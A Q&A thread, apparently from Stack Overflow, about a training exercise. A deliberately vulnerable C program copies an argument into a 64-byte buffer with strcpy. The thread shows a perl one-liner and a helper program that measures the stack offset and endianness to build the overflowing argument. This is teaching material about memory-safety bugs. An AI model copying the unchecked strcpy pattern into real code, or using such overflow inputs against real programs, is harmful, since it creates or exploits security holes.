
I cannot overflow the buffer

I have seen some buffer overflow code, but I cannot overflow it. Is there any gcc option needed to compile it? Or is anything wrong with that code?

The code is:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>   /* declares errx(), which is called below */

int main(int argc, char **argv)
{
     volatile int modified;
     char buffer[64];

     if(argc == 1) {
          errx(1, "please specify an argument\n");
     }

     modified = 0;
     strcpy(buffer, argv[1]);

     if(modified == 0x61626364) {
            printf("you have correctly got the variable to the right value\n");
     } else {
            printf("Try again, you got 0x%08x\n", modified);
     }
}

and I am trying to run it this way:
perl -e 'print "A"x64 . "dcba"' | xargs ./main

You need to know:

  1. The stack memory layout and the address difference between the variable modified and buffer. You can solve it by finding the offset between modified and buffer as (char *)&modified - (char *)buffer.
  2. Your machine's endianness. I have used the Stack Overflow answer for this purpose.

The linked demonstrates how to run the modified code that serves the purpose of determining the correct argument as well as stack smashing. The first Demo provides you with the argument that you can feed to your second Demo.
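The two checks from the answer above, as an added example that is not code from the original post or the linked demos: it measures the offset from buffer to modified in its own stack frame, detects the byte order, and builds the matching argument. The helper names (is_little_endian, value_bytes, build_argument) are made up for this sketch, and the layout it reports holds only for this program as compiled.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define TARGET 0x61626364u   /* value the question's program compares against */

/* 1 if the lowest-addressed byte of an integer is its least significant one. */
int is_little_endian(void)
{
    uint32_t probe = 1;
    unsigned char first;
    memcpy(&first, &probe, 1);
    return first == 1;
}

/* Copy the bytes of value in the order this machine stores them in memory. */
void value_bytes(uint32_t value, unsigned char out[4])
{
    memcpy(out, &value, 4);
}

/* Fill out with `offset` filler bytes, then the in-memory bytes of value.
 * Returns the length, or -1 if offset < 0 or out is too small. */
long build_argument(long offset, uint32_t value, char *out, size_t cap)
{
    if (offset < 0 || (size_t)offset + 5 > cap)
        return -1;
    memset(out, 'A', (size_t)offset);
    memcpy(out + offset, &value, 4);
    out[offset + 4] = '\0';
    return offset + 4;
}

int main(void)
{
    volatile int modified = 0;   /* same locals as the question's main() */
    char buffer[64];
    char arg[256];
    /* Integer form of (char *)&modified - (char *)buffer from the answer. */
    long offset = (long)((intptr_t)&modified - (intptr_t)buffer);
    buffer[0] = '\0';
    printf("endianness: %s\n", is_little_endian() ? "little" : "big");
    printf("offset from buffer to modified: %ld bytes\n", offset);
    if (build_argument(offset, TARGET, arg, sizeof arg) < 0)
        puts("modified is not above buffer in this build; strcpy cannot reach it");
    else
        printf("argument: %s\n", arg);
    return 0;
}
```

A negative or unexpected offset means the compiler placed or padded the locals differently from what a fixed 64-byte filler assumes, so the measurement has to come from a build that uses the same compiler and flags as the program being tested.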
